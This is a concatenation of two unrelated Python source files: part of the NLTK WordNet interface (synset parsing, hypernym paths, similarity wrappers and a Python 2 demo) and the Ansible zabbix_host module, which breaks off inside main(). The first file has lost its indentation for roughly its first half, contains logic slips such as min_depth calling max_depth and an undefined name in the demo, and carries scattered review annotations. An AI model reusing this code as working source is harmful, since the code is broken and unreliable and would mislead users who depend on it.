# synset_offset lex_filenum ss_type w_cnt word lex_id [word lex_id...] p_cnt [ptr...] [frames...] | gloss
synset_cnt = int(tokens[3], 16) # hex integer representing number of items in the synset; same as w_cnt above
#extract all pairs of the form (sense, sense_index), plus a remainder
(senseTuples, remainder1) = _partition(tokens[4:], 2, synset_cnt)
self.words = [form for form, i in senseTuples]
#extract all pointer quadruples, plus a remainder
(self._pointerTuples, remainder2) = _partition(remainder1[1:], 4, int(remainder1[0]))
#frames: In data.verb only, a list of numbers corresponding to the
#generic verb sentence frames for word s in the synset. frames is of
#the form:
#f_cnt + f_num w_num [ + f_num w_num...]
#where f_cnt is a two digit decimal integer indicating the number of
#generic frames listed, f_num is a two digit decimal integer frame
#number, and w_num is a two digit hexadecimal integer indicating the
#word in the synset that the frame applies to. As with pointers, if
#this number is 00 , f_num applies to all word s in the synset. If
#non-zero, it is applicable only to the word indicated. Word numbers
#are assigned as described for pointers.
if pos == VERB:
(vfTuples, remainder3) = _partition(remainder2[1:], 3, int(remainder2[0]))
#now only used for senseVerbFrames
def extractVerbFrames(index, vfTuples):
return tuple(map(lambda t:int(t[1]), filter(lambda t,i=index:int(t[2],16) in (0, i), vfTuples)))
senseVerbFrames = []
for index in range(1, len(self.words) + 1):
senseVerbFrames.append(extractVerbFrames(index, vfTuples))
self._senseVerbFrames = senseVerbFrames
# A sequence of integers that index into VERB_FRAME_STRINGS. These
# list the verb frames that any Sense in this synset participates
# in (see also Sense.verbFrames). Defined only for verbs.
self.verbFrames = tuple(extractVerbFrames(None, vfTuples))
#A list of verb frame strings for this synset
self.verbFrameStrings = self.extractVerbFrameStrings(vfTuples)
def extractVerbFrameStrings(self, vfTuples):
"""
Return a list of verb frame strings for this synset.
"""
# extract a frame index if 3rd item is 00
frame_indices = [int(t[1], 16) for t in vfTuples if int(t[2], 16) == 0]
try:
verbFrames = [VERB_FRAME_STRINGS[i] for i in frame_indices]
except IndexError:
return []
#ideally we should build 3rd person morphology for this form
form = self[0]
verbFrameStrings = [vf % form for vf in verbFrames]
return verbFrameStrings
def relations(self):
"""
Return a dictionary of synsets
If pointerType is specified, only pointers of that type are
returned. In this case, pointerType should be an element of
POINTER_TYPES.
@return: relations defined on this L{Synset}.
"""
# Load the pointers from the Wordnet files if necessary.
if not hasattr(self, '_relations'):
relations = defaultdict(list)
for (type, offset, pos, indices) in self._pointerTuples:
rel = _RELATION_TABLE[type]
idx = int(indices, 16) & 255
pos = normalizePOS(pos)
offset = int(offset)
synset = getSynset(pos, offset)
if idx:
relations[rel].append(synset[idx-1])
else:
relations[rel].append(synset)
del self._pointerTuples
self._relations = dict(relations)
return self._relations
def relation(self, rel):
return self.relations().get(rel, [])
### BROKEN:
def isTagged(self):
"""
>>> from nltk.wordnet import *
>>> N['dog'][0].isTagged()
True
>>> N['dog'][1].isTagged()
False
@return: True/false (1/0) if one of this L{Word}'s senses is tagged.
"""
return len(filter(Word.isTagged, self.words)) > 0
def __str__(self):
"""
Return a human-readable representation.
>>> from nltk.wordnet import *
>>> str(N['dog'][0].synset)
'{noun: dog, domestic dog, Canis familiaris}'
"""
return "{" + self.pos + ": " + string.join(self.words, ", ") + "}"
def __repr__(self):
return "{" + self.pos + ": " + string.join(self.words, ", ") + "}"
def __cmp__(self, other):
return _compareInstances(self, other, ('pos', 'offset'))
def __eq__(self, other):
return _compareInstances(self, other, ('pos', 'offset')) == 0
def __ne__(self, other):
return not (self==other)
def __getitem__(self, idx):
try:
return self.words[idx] # integer key
except TypeError:
return self.relation(idx) # string key
def __iter__(self):
return iter(self.words)
def __contains__(self, item):
return item in self.words
def __getslice__(self, i, j):
return self.words[i:j]
def __nonzero__(self):
return 1
def __len__(self):
"""
>>> from nltk.wordnet import *
>>> len(N['dog'][0].synset)
3
"""
return len(self.words)
def max_depth(self):
"""
@return: The length of the longest hypernym path from this synset to the root.
"""
if self[HYPERNYM] == []:
return 0
deepest = 0
for hypernym in self[HYPERNYM]:
depth = hypernym.max_depth()
if depth > deepest:
deepest = depth
return deepest + 1
def min_depth(self):
"""
@return: The length of the shortest hypernym path from this synset to the root.
"""
if self[HYPERNYM] == []:
return 0
shallowest = 1000
for hypernym in self[HYPERNYM]:
depth = hypernym.max_depth()
if depth < shallowest:
shallowest = depth
return shallowest + 1
def closure(self, rel, depth=-1):
"""Return the transitive closure of source under the rel relationship, breadth-first
>>> dog = N['dog'][0]
>>> dog.closure(HYPERNYM)
[{noun: dog, domestic dog, Canis familiaris}, {noun: canine, canid}, {noun: carnivore}, {noun: placental, placental mammal, eutherian, eutherian mammal}, {noun: mammal, mammalian}, {noun: vertebrate, craniate}, {noun: chordate}, {noun: animal, animate being, beast, brute, creature, fauna}, {noun: organism, being}, {noun: living thing, animate thing}, {noun: object, physical object}, {noun: physical entity}, {noun: entity}]
"""
from nltk.utilities import breadth_first
synset_offsets = []
for synset in breadth_first(self, lambda s:s[rel], depth):
if synset.offset != self.offset and synset.offset not in synset_offsets:
synset_offsets.append(synset.offset)
yield synset
# return synsets
def hypernym_paths(self):
"""
Get the path(s) from this synset to the root, where each path is a
list of the synset nodes traversed on the way to the root.
@return: A list of lists, where each list gives the node sequence
connecting the initial L{Synset} node and a root node.
"""
paths = []
hypernyms = self[HYPERNYM]
if len(hypernyms) == 0:
paths = [[self]]
for hypernym in hypernyms:
for ancestor_list in hypernym.hypernym_paths():
ancestor_list.append(self)
paths.append(ancestor_list)
return paths
def hypernym_distances(self, distance, verbose=False):
"""
Get the path(s) from this synset to the root, counting the distance
of each node from the initial node on the way. A list of
(synset, distance) tuples is returned.
@type distance: C{int}
@param distance: the distance (number of edges) from this hypernym to
the original hypernym L{Synset} on which this method was called.
@return: A list of (L{Synset}, int) tuples where each L{Synset} is
a hypernym of the first L{Synset}.
"""
distances = set([(self, distance)])
for hypernym in self[HYPERNYM]:
distances |= hypernym.hypernym_distances(distance+1, verbose=False)
if verbose:
print "> Hypernym Distances:", self, string.join(synset.__str__() + ":" + `dist` for synset, dist in distances)
return distances
def shortest_path_distance(self, other):
    """
    Returns the distance of the shortest path linking the two synsets (if
    one exists). For each synset, all the ancestor nodes and their distances
    are recorded and compared. The ancestor node common to both synsets that
    can be reached with the minimum number of traversals is used. If no
    ancestor nodes are common, -1 is returned. If a node is compared with
    itself 0 is returned.

    @type other: L{Synset}
    @param other: The Synset to which the shortest path will be found.
    @return: The number of edges in the shortest path connecting the two
        nodes, or -1 if no path exists.
    """
    if self == other:
        return 0

    # Collapse each (synset, distance) collection into a dict keeping only
    # the minimum distance per ancestor (duplicates arise because multiple
    # paths can reach the root).
    self_ancestors = {}
    other_ancestors = {}
    for pairs, table in ((self.hypernym_distances(0), self_ancestors),
                         (other.hypernym_distances(0), other_ancestors)):
        for node, dist in pairs:
            if node not in table or dist < table[node]:
                table[node] = dist

    # The shortest connecting path goes through some common ancestor; its
    # length is the sum of the two distances to that ancestor.
    shortest = -1
    for node, dist in self_ancestors.items():
        if node in other_ancestors:
            total = dist + other_ancestors[node]
            if shortest < 0 or total < shortest:
                shortest = total
    return shortest
def information_content(self, freq_data):
    """
    Get the Information Content value of this L{Synset}, using
    the supplied dict 'freq_data'.

    @type freq_data: C{dict}
    @param freq_data: Dictionary mapping synset identifiers (offsets) to
        a tuple containing the frequency count of the synset, and the
        frequency count of the root synset.
    @return: The IC value of this L{Synset} (the negative log of its
        probability), or -1 if no IC value can be computed.
    """
    key = self.offset
    # 'has_key' is Python-2-only and removed in Python 3; the 'in'
    # operator is equivalent and works on both.
    if key in freq_data:
        count, root_count = freq_data[key]
        prob = float(count) / root_count
        return -math.log(prob)
    else:
        return -1
def tree(self, rel, depth=-1, cut_mark=None):
    """
    Return a nested-list tree rooted at this synset, expanding the given
    relation recursively.

    @param rel: the relation to follow (e.g. HYPERNYM).
    @param depth: how many levels to expand; a negative value means no
        limit (the default).
    @param cut_mark: if given, appended wherever the depth limit truncated
        the expansion.
    @return: a list whose first element is this synset and whose remaining
        elements are the subtrees of its related synsets.
    """
    result = [self]
    if depth == 0:
        # Depth exhausted: optionally mark the truncation point.
        if cut_mark:
            result.append(cut_mark)
        return result
    for child in self[rel]:
        result.append(child.tree(rel, depth - 1, cut_mark))
    return result
# interface to similarity methods
def path_similarity(self, other, verbose=False):
    # Thin wrapper delegating to the module-level path_similarity function.
    return path_similarity(self, other, verbose)
def lch_similarity(self, other, verbose=False):
    # Thin wrapper delegating to the module-level lch_similarity function.
    return lch_similarity(self, other, verbose)
def wup_similarity(self, other, verbose=False):
    # Thin wrapper delegating to the module-level wup_similarity function.
    return wup_similarity(self, other, verbose)
def res_similarity(self, other, datafile="", verbose=False):
    # Thin wrapper delegating to the module-level res_similarity function.
    return res_similarity(self, other, datafile, verbose)
def jcn_similarity(self, other, datafile="", verbose=False):
    # Thin wrapper delegating to the module-level jcn_similarity function.
    # (A stray 'bd' token followed this method in the class body; it would
    # raise NameError the moment the module is imported, so it is removed.)
    return jcn_similarity(self, other, datafile, verbose)
def lin_similarity(self, other, datafile="", verbose=False):
    # Thin wrapper delegating to the module-level lin_similarity function.
    return lin_similarity(self, other, datafile, verbose)
# Utility functions
def _check_datafile(datafile):
    """
    Ensure a frequency-data file path was supplied; raise RuntimeError if not.

    The original used an identity check ('datafile is ""'), which is only
    true by accident of CPython small-string interning, and the Python-2-only
    comma form of raise; both are replaced with portable equivalents.
    """
    if not datafile:
        raise RuntimeError("You must supply the path of a datafile containing frequency information, as generated by brown_information_content() in 'brown_ic.py'")
def _load_ic_data(filename):
    """
    Load in some precomputed frequency distribution data from a file. It is
    expected that this data has been stored as two pickled dicts.

    @return: a (noun_freqs, verb_freqs) tuple of dicts.

    TODO: Possibly place the dicts into a global variable or something so
    that they don't have to be repeatedly loaded from disk.
    """
    infile = open(filename, "rb")
    # try/finally guarantees the file handle is closed even when
    # pickle.load raises (the original leaked it on error).
    try:
        noun_freqs = pickle.load(infile)
        verb_freqs = pickle.load(infile)
    finally:
        infile.close()
    return (noun_freqs, verb_freqs)
# Lexical Relations
# Maps the pointer symbols used in the WordNet database files to the
# relation constants defined earlier in this module (e.g. '@' -> HYPERNYM).
_RELATION_TABLE = {
    '!': ANTONYM, '@': HYPERNYM, '~': HYPONYM, '=': ATTRIBUTE,
    '^': ALSO_SEE, '*': ENTAILMENT, '>': CAUSE, '$': VERB_GROUP,
    '#m': MEMBER_MERONYM, '#s': SUBSTANCE_MERONYM, '#p': PART_MERONYM,
    '%m': MEMBER_HOLONYM, '%s': SUBSTANCE_HOLONYM, '%p': PART_HOLONYM,
    '&': SIMILAR, '<': PARTICIPLE_OF, '\\': PERTAINYM, '+': FRAMES,
    ';c': CLASSIF_CATEGORY, ';u': CLASSIF_USAGE, ';r': CLASSIF_REGIONAL,
    '-c': CLASS_CATEGORY, '-u': CLASS_USAGE, '-r': CLASS_REGIONAL,
    '@i': INSTANCE_HYPERNYM,'~i': INSTANCE_HYPONYM,
    }
# Private Utility Functions
def _index(key, sequence, testfn=None, keyfn=None):
    """
    Return the index of key within sequence, using testfn for
    comparison and transforming items of sequence by keyfn first.
    Returns None when the key is not found.

    >>> _index('e', 'hello')
    1
    >>> _index('E', 'hello', testfn=_equalsIgnoreCase)
    1
    >>> _index('x', 'hello')
    """
    for position, item in enumerate(sequence):
        candidate = item
        if keyfn:
            candidate = keyfn(candidate)
        if testfn:
            if testfn(candidate, key):
                return position
        elif candidate == key:
            return position
    return None
def _partition(sequence, size, count):
    """
    Partition sequence into C{count} subsequences of
    length C{size}, and a remainder.

    Return C{(partitions, remainder)}, where C{partitions} is a sequence of
    C{count} subsequences of cardinality C{size}, and
    C{apply(append, partitions) + remainder == sequence}.
    """
    cut = size * count
    partitions = [sequence[start:start + size] for start in range(0, cut, size)]
    return (partitions, sequence[cut:])
def _compareInstances(a, b, fields):
    """
    Return -1, 0, or 1 according to a comparison first by type,
    then by class, and finally by each of fields. Used when comparing two
    Wordnet objects (Synsets, Words, or Senses) to each other.
    """
    # NOTE: relies on the Python 2 builtin cmp(), which no longer exists
    # in Python 3; left untouched to preserve ordering semantics.
    if not hasattr(b, '__class__'):
        return cmp(type(a), type(b))
    elif a.__class__ != b.__class__:
        return cmp(a.__class__, b.__class__)
    for field in fields:
        diff = cmp(getattr(a, field), getattr(b, field))
        if diff: return diff
    return 0
def _equalsIgnoreCase(a, b):
    """
    Return true iff a and b have the same lowercase representation.

    >>> _equalsIgnoreCase('dog', 'Dog')
    True
    >>> _equalsIgnoreCase('dOg', 'DOG')
    True
    """
    # Fast path: identical strings need no lowercasing.
    if a == b:
        return True
    return a.lower() == b.lower()
def demo():
    """Exercise the main wordnet interfaces: word lookups, relations,
    glosses, hypernym paths/distances, closures/trees, and the similarity
    measures. Intended to be run as a script (Python 2 only)."""
    from nltk import wordnet
    from pprint import pprint
    dog = wordnet.N['dog']
    cat = wordnet.N['cat']
    # Basic word-level accessors
    print "wordnet.N['dog']"
    print 'dog' in wordnet.N
    print dog
    print dog.pos, dog.form
    print dog.taggedSenseCount
    print dog.synsets()
    print dog.isTagged()
    # ADJ['clear'].getAdjectivePositions()
    # N['cat'] < N['dog']
    # N['dog'] < V['dog']
    print "Verb Frames:",
    print wordnet.V['think'][0].verbFrameStrings
    print "Relations:"
    print dog[0].relations()
    print dog[0][wordnet.HYPERNYM]
    print "Glosses:"
    print dog[0].gloss
    print dog[0].relation(wordnet.HYPERNYM)[0].gloss
    print
    print "Paths and Distances:"
    print
    print dog[0].hypernym_paths()
    print dog[0].hypernym_distances(0)
    print dog[0].shortest_path_distance(cat[0])
    print
    print "Closures and Trees:"
    print
    pprint(wordnet.ADJ['red'][0].closure(wordnet.SIMILAR, depth=1))
    pprint(wordnet.ADJ['red'][0].closure(wordnet.SIMILAR, depth=2))
    pprint(dog[0].tree(wordnet.HYPERNYM))
    pprint(dog[0].tree(wordnet.HYPERNYM, depth=2, cut_mark = '...'))
    entity = wordnet.N["entity"]
    print entity, entity[0]
    print entity[0][wordnet.HYPONYM]
    pprint(entity[0].tree(wordnet.HYPONYM, depth=1), indent=4)
    abstract_entity = wordnet.N["abstract entity"]
    print abstract_entity, abstract_entity[0]
    print abstract_entity[0][wordnet.HYPONYM]
    pprint(abstract_entity[0].tree(wordnet.HYPONYM, depth=1), indent=4)
    # Adjectives that are transitively SIMILAR to any of the senses of 'red'
    #flatten1(map(lambda sense:closure(sense, SIMILAR), ADJ['red'])) # too verbose
    print "All the words in the hyponym synsets of dog[0]"
    print [word for synset in dog[0][wordnet.HYPONYM] for word in synset]
    print "Hyponyms of the first (and only) sense of 'animal' that are homophonous with verbs:"
    # NOTE(review): the bare 'V' below looks like it should be 'wordnet.V';
    # as written this line raises NameError -- confirm before relying on it.
    print [word for synset in wordnet.N['animal'][0].closure(wordnet.HYPONYM) for word in synset if word in V]
    # BROKEN
    print "Senses of 'raise'(v.) and 'lower'(v.) that are antonyms:"
    print filter(lambda p:p[0] in p[1][wordnet.ANTONYM], [(r,l) for r in wordnet.V['raise'] for l in wordnet.V['lower']])
    print
    print "Similarity: dog~cat"
    print
    print "Path Distance Similarity:",
    print dog[0].path_similarity(cat[0])
    print "Leacock Chodorow Similarity:",
    print dog[0].lch_similarity(cat[0])
    print "Wu Palmer Similarity:",
    print dog[0].wup_similarity(cat[0])
    # set up the data file
    # print "Resnik Similarity:",
    # print dog[0].resnik_similarity(cat[0], datafile)
    # print "Jiang-Conrath Similarity:",
    # print dog[0].jiang_conrath_similarity(cat[0], datafile)
    # print "Lin Similarity:",
    # print dog[0].lin_similarity(cat[0], datafile)

# Run the demonstration when executed as a script.
if __name__ == '__main__':
    demo()
| gpl-3.0 |
ptemplier/ansible | lib/ansible/modules/monitoring/zabbix_host.py | 11 | 22176 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013-2014, Epic Games, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: zabbix_host
short_description: Zabbix host creates/updates/deletes
description:
- This module allows you to create, modify and delete Zabbix host entries and associated group and template data.
version_added: "2.0"
author:
- "(@cove)"
- "Tony Minfei Ding"
- "Harrison Gu (@harrisongu)"
requirements:
- "python >= 2.6"
- zabbix-api
options:
server_url:
description:
- Url of Zabbix server, with protocol (http or https).
required: true
aliases: [ "url" ]
login_user:
description:
- Zabbix user name, used to authenticate against the server.
required: true
login_password:
description:
- Zabbix user password.
required: true
http_login_user:
description:
- Basic Auth login
required: false
default: None
version_added: "2.1"
http_login_password:
description:
- Basic Auth password
required: false
default: None
version_added: "2.1"
host_name:
description:
- Name of the host in Zabbix.
- host_name is the unique identifier used and cannot be updated using this module.
required: true
visible_name:
description:
- Visible name of the host in Zabbix.
required: false
version_added: '2.3'
host_groups:
description:
- List of host groups the host is part of.
required: false
link_templates:
description:
- List of templates linked to the host.
required: false
default: None
inventory_mode:
description:
- Configure the inventory mode.
choices: ['automatic', 'manual', 'disabled']
required: false
default: None
version_added: '2.1'
status:
description:
- Monitoring status of the host.
required: false
choices: ['enabled', 'disabled']
default: "enabled"
state:
description:
- State of the host.
- On C(present), it will create if host does not exist or update the host if the associated data is different.
- On C(absent) will remove a host if it exists.
required: false
choices: ['present', 'absent']
default: "present"
timeout:
description:
- The timeout of API request (seconds).
default: 10
proxy:
description:
- The name of the Zabbix Proxy to be used
default: None
interfaces:
description:
- List of interfaces to be created for the host (see example below).
- 'Available values are: dns, ip, main, port, type and useip.'
- Please review the interface documentation for more information on the supported properties
- 'https://www.zabbix.com/documentation/2.0/manual/appendix/api/hostinterface/definitions#host_interface'
required: false
default: []
force:
description:
- Overwrite the host configuration, even if already present
required: false
default: "yes"
choices: [ "yes", "no" ]
version_added: "2.0"
'''
EXAMPLES = '''
- name: Create a new host or update an existing host's info
local_action:
module: zabbix_host
server_url: http://monitor.example.com
login_user: username
login_password: password
host_name: ExampleHost
visible_name: ExampleName
host_groups:
- Example group1
- Example group2
link_templates:
- Example template1
- Example template2
status: enabled
state: present
inventory_mode: automatic
interfaces:
- type: 1
main: 1
useip: 1
ip: 10.xx.xx.xx
dns: ""
port: 10050
- type: 4
main: 1
useip: 1
ip: 10.xx.xx.xx
dns: ""
port: 12345
proxy: a.zabbix.proxy
'''
import copy
try:
    from zabbix_api import ZabbixAPI, ZabbixAPISubClass

    # Extend the ZabbixAPI
    # Since the zabbix-api python module too old (version 1.0, no higher version so far),
    # it does not support the 'hostinterface' api calls,
    # so we have to inherit the ZabbixAPI class to add 'hostinterface' support.
    class ZabbixAPIExtends(ZabbixAPI):
        """ZabbixAPI subclass that exposes the 'hostinterface' API namespace."""
        hostinterface = None

        def __init__(self, server, timeout, user, passwd, **kwargs):
            ZabbixAPI.__init__(self, server, timeout=timeout, user=user, passwd=passwd)
            self.hostinterface = ZabbixAPISubClass(self, dict({"prefix": "hostinterface"}, **kwargs))

    HAS_ZABBIX_API = True
except ImportError:
    # Checked in main() so a missing dependency yields a helpful fail_json
    # message instead of an import-time crash.
    HAS_ZABBIX_API = False
from ansible.module_utils.basic import AnsibleModule
class Host(object):
    """Helper encapsulating every Zabbix API call this module makes.

    Methods either return data or abort the whole module run via
    self._module.fail_json / exit_json, so callers rarely need to handle
    errors themselves.
    """
    def __init__(self, module, zbx):
        # module: the AnsibleModule instance (check-mode detection, error exits).
        # zbx: an authenticated ZabbixAPI client.
        self._module = module
        self._zapi = zbx

    # exist host
    def is_host_exist(self, host_name):
        # Returns the raw (possibly empty) host.get result; callers use the
        # list's truthiness as the existence test.
        result = self._zapi.host.get({'filter': {'host': host_name}})
        return result

    # check if host group exists
    def check_host_group_exist(self, group_names):
        # Fails the module on the first unknown group name; True otherwise.
        for group_name in group_names:
            result = self._zapi.hostgroup.get({'filter': {'name': group_name}})
            if not result:
                self._module.fail_json(msg="Hostgroup not found: %s" % group_name)
        return True

    def get_template_ids(self, template_list):
        # Resolve a list of template names to their template ids.
        template_ids = []
        if template_list is None or len(template_list) == 0:
            return template_ids
        for template in template_list:
            # NOTE(review): rebinding 'template_list' inside the loop is safe
            # (the iterator is already bound) but misleading to readers.
            template_list = self._zapi.template.get({'output': 'extend', 'filter': {'host': template}})
            if len(template_list) < 1:
                self._module.fail_json(msg="Template not found: %s" % template)
            else:
                template_id = template_list[0]['templateid']
                template_ids.append(template_id)
        return template_ids

    def add_host(self, host_name, group_ids, status, interfaces, proxy_id, visible_name):
        """Create a new host and return its id (exits early in check mode)."""
        try:
            if self._module.check_mode:
                self._module.exit_json(changed=True)
            parameters = {'host': host_name, 'interfaces': interfaces, 'groups': group_ids, 'status': status}
            if proxy_id:
                parameters['proxy_hostid'] = proxy_id
            if visible_name:
                parameters['name'] = visible_name
            host_list = self._zapi.host.create(parameters)
            if len(host_list) >= 1:
                return host_list['hostids'][0]
        except Exception as e:
            self._module.fail_json(msg="Failed to create host %s: %s" % (host_name, e))

    def update_host(self, host_name, group_ids, status, host_id, interfaces, exist_interface_list, proxy_id, visible_name):
        """Update host attributes and reconcile its interfaces.

        Interfaces are matched by type: matches are updated in place, missing
        ones created, and leftovers deleted.
        """
        try:
            if self._module.check_mode:
                self._module.exit_json(changed=True)
            parameters = {'hostid': host_id, 'groups': group_ids, 'status': status}
            if proxy_id:
                parameters['proxy_hostid'] = proxy_id
            if visible_name:
                parameters['name'] = visible_name
            self._zapi.host.update(parameters)
            # NOTE(review): despite the name this is an alias, not a copy --
            # the remove() calls below mutate the caller's list.
            interface_list_copy = exist_interface_list
            if interfaces:
                for interface in interfaces:
                    flag = False
                    interface_str = interface
                    for exist_interface in exist_interface_list:
                        interface_type = interface['type']
                        exist_interface_type = int(exist_interface['type'])
                        if interface_type == exist_interface_type:
                            # update
                            interface_str['interfaceid'] = exist_interface['interfaceid']
                            self._zapi.hostinterface.update(interface_str)
                            flag = True
                            interface_list_copy.remove(exist_interface)
                            break
                    if not flag:
                        # add
                        interface_str['hostid'] = host_id
                        self._zapi.hostinterface.create(interface_str)
            # remove existing interfaces that matched nothing in the desired list
            remove_interface_ids = []
            for remove_interface in interface_list_copy:
                interface_id = remove_interface['interfaceid']
                remove_interface_ids.append(interface_id)
            if len(remove_interface_ids) > 0:
                self._zapi.hostinterface.delete(remove_interface_ids)
        except Exception as e:
            self._module.fail_json(msg="Failed to update host %s: %s" % (host_name, e))

    def delete_host(self, host_id, host_name):
        """Delete the host (exits early in check mode)."""
        try:
            if self._module.check_mode:
                self._module.exit_json(changed=True)
            self._zapi.host.delete([host_id])
        except Exception as e:
            self._module.fail_json(msg="Failed to delete host %s: %s" % (host_name, e))

    # get host by host name
    def get_host_by_host_name(self, host_name):
        # Returns the full host object; fails the module when absent.
        host_list = self._zapi.host.get({'output': 'extend', 'filter': {'host': [host_name]}})
        if len(host_list) < 1:
            self._module.fail_json(msg="Host not found: %s" % host_name)
        else:
            return host_list[0]

    # get proxyid by proxy name
    def get_proxyid_by_proxy_name(self, proxy_name):
        proxy_list = self._zapi.proxy.get({'output': 'extend', 'filter': {'host': [proxy_name]}})
        if len(proxy_list) < 1:
            self._module.fail_json(msg="Proxy not found: %s" % proxy_name)
        else:
            return proxy_list[0]['proxyid']

    # get group ids by group names
    def get_group_ids_by_group_names(self, group_names):
        # Returns [{'groupid': id}, ...] in the shape host.create/update expect.
        group_ids = []
        if self.check_host_group_exist(group_names):
            group_list = self._zapi.hostgroup.get({'output': 'extend', 'filter': {'name': group_names}})
            for group in group_list:
                group_id = group['groupid']
                group_ids.append({'groupid': group_id})
        return group_ids

    # get host templates by host id
    def get_host_templates_by_host_id(self, host_id):
        template_ids = []
        template_list = self._zapi.template.get({'output': 'extend', 'hostids': host_id})
        for template in template_list:
            template_ids.append(template['templateid'])
        return template_ids

    # get host groups by host id
    def get_host_groups_by_host_id(self, host_id):
        exist_host_groups = []
        host_groups_list = self._zapi.hostgroup.get({'output': 'extend', 'hostids': host_id})
        if len(host_groups_list) >= 1:
            for host_groups_name in host_groups_list:
                exist_host_groups.append(host_groups_name['name'])
        return exist_host_groups

    # check the exist_interfaces whether it equals the interfaces or not
    def check_interface_properties(self, exist_interface_list, interfaces):
        """Return True when the desired interfaces differ from the existing ones."""
        interfaces_port_list = []
        if interfaces is not None:
            if len(interfaces) >= 1:
                for interface in interfaces:
                    interfaces_port_list.append(int(interface['port']))
        exist_interface_ports = []
        if len(exist_interface_list) >= 1:
            for exist_interface in exist_interface_list:
                exist_interface_ports.append(int(exist_interface['port']))
        # A difference in the port sets means a change is needed.
        if set(interfaces_port_list) != set(exist_interface_ports):
            return True
        for exist_interface in exist_interface_list:
            exit_interface_port = int(exist_interface['port'])
            for interface in interfaces:
                interface_port = int(interface['port'])
                if interface_port == exit_interface_port:
                    for key in interface.keys():
                        # NOTE(review): a key present in the desired interface
                        # but absent from the existing one raises KeyError here;
                        # confirm the API always returns a superset of the
                        # user-supplied keys.
                        if str(exist_interface[key]) != str(interface[key]):
                            return True
        return False

    # get the status of host by host
    def get_host_status_by_host(self, host):
        return host['status']

    # check all the properties before link or clear template
    def check_all_properties(self, host_id, host_groups, status, interfaces, template_ids,
                             exist_interfaces, host, proxy_id, visible_name):
        """Return True when any tracked property differs from the current host state."""
        # get the existing host's groups
        exist_host_groups = self.get_host_groups_by_host_id(host_id)
        if set(host_groups) != set(exist_host_groups):
            return True
        # get the existing status
        exist_status = self.get_host_status_by_host(host)
        if int(status) != int(exist_status):
            return True
        # check the exist_interfaces whether it equals the interfaces or not
        if self.check_interface_properties(exist_interfaces, interfaces):
            return True
        # get the existing templates
        exist_template_ids = self.get_host_templates_by_host_id(host_id)
        if set(list(template_ids)) != set(exist_template_ids):
            return True
        if host['proxy_hostid'] != proxy_id:
            return True
        if host['name'] != visible_name:
            return True
        return False

    # link or clear template of the host
    def link_or_clear_template(self, host_id, template_id_list):
        """Link the given templates and unlink+clear any currently-linked extras."""
        # get host's exist template ids
        exist_template_id_list = self.get_host_templates_by_host_id(host_id)
        exist_template_ids = set(exist_template_id_list)
        template_ids = set(template_id_list)
        template_id_list = list(template_ids)
        # get unlink and clear templates
        templates_clear = exist_template_ids.difference(template_ids)
        templates_clear_list = list(templates_clear)
        request_str = {'hostid': host_id, 'templates': template_id_list, 'templates_clear': templates_clear_list}
        try:
            if self._module.check_mode:
                self._module.exit_json(changed=True)
            self._zapi.host.update(request_str)
        except Exception as e:
            self._module.fail_json(msg="Failed to link template to host: %s" % e)

    # Update the host inventory_mode
    def update_inventory_mode(self, host_id, inventory_mode):
        """Translate the symbolic inventory mode and push it to the host."""
        # nothing was set, do nothing
        if not inventory_mode:
            return
        if inventory_mode == "automatic":
            inventory_mode = int(1)
        elif inventory_mode == "manual":
            inventory_mode = int(0)
        elif inventory_mode == "disabled":
            inventory_mode = int(-1)
        # watch for - https://support.zabbix.com/browse/ZBX-6033
        request_str = {'hostid': host_id, 'inventory_mode': inventory_mode}
        try:
            if self._module.check_mode:
                self._module.exit_json(changed=True)
            self._zapi.host.update(request_str)
        except Exception as e:
            self._module.fail_json(msg="Failed to set inventory_mode to host: %s" % e)
def main():
    """Module entry point: parse parameters, log in to Zabbix, then create,
    update or delete the host so it matches the requested state."""
    module = AnsibleModule(
        argument_spec=dict(
            server_url=dict(type='str', required=True, aliases=['url']),
            login_user=dict(type='str', required=True),
            login_password=dict(type='str', required=True, no_log=True),
            host_name=dict(type='str', required=True),
            http_login_user=dict(type='str', required=False, default=None),
            http_login_password=dict(type='str', required=False, default=None, no_log=True),
            host_groups=dict(type='list', required=False),
            link_templates=dict(type='list', required=False),
            status=dict(default="enabled", choices=['enabled', 'disabled']),
            state=dict(default="present", choices=['present', 'absent']),
            inventory_mode=dict(required=False, choices=['automatic', 'manual', 'disabled']),
            timeout=dict(type='int', default=10),
            interfaces=dict(type='list', required=False),
            force=dict(type='bool', default=True),
            proxy=dict(type='str', required=False),
            visible_name=dict(type='str', required=False)
        ),
        supports_check_mode=True
    )
    if not HAS_ZABBIX_API:
        module.fail_json(msg="Missing required zabbix-api module (check docs or install with: pip install zabbix-api)")
    server_url = module.params['server_url']
    login_user = module.params['login_user']
    login_password = module.params['login_password']
    http_login_user = module.params['http_login_user']
    http_login_password = module.params['http_login_password']
    host_name = module.params['host_name']
    visible_name = module.params['visible_name']
    host_groups = module.params['host_groups']
    link_templates = module.params['link_templates']
    inventory_mode = module.params['inventory_mode']
    status = module.params['status']
    state = module.params['state']
    timeout = module.params['timeout']
    interfaces = module.params['interfaces']
    force = module.params['force']
    proxy = module.params['proxy']
    # convert enabled to 0; disabled to 1
    status = 1 if status == "disabled" else 0
    zbx = None
    # login to zabbix
    try:
        zbx = ZabbixAPIExtends(server_url, timeout=timeout, user=http_login_user, passwd=http_login_password)
        zbx.login(login_user, login_password)
    except Exception as e:
        module.fail_json(msg="Failed to connect to Zabbix server: %s" % e)
    host = Host(module, zbx)
    template_ids = []
    if link_templates:
        template_ids = host.get_template_ids(link_templates)
    group_ids = []
    if host_groups:
        group_ids = host.get_group_ids_by_group_names(host_groups)
    # remember the agent-interface (type 1) IP purely for the result message
    ip = ""
    if interfaces:
        for interface in interfaces:
            if interface['type'] == 1:
                ip = interface['ip']
    # check if host exist
    is_host_exist = host.is_host_exist(host_name)
    if is_host_exist:
        # Use proxy specified, or set to None when updating host
        if proxy:
            proxy_id = host.get_proxyid_by_proxy_name(proxy)
        else:
            proxy_id = None
        # get host id by host name
        zabbix_host_obj = host.get_host_by_host_name(host_name)
        host_id = zabbix_host_obj['hostid']
        if state == "absent":
            # remove host
            host.delete_host(host_id, host_name)
            module.exit_json(changed=True, result="Successfully delete host %s" % host_name)
        else:
            if not group_ids:
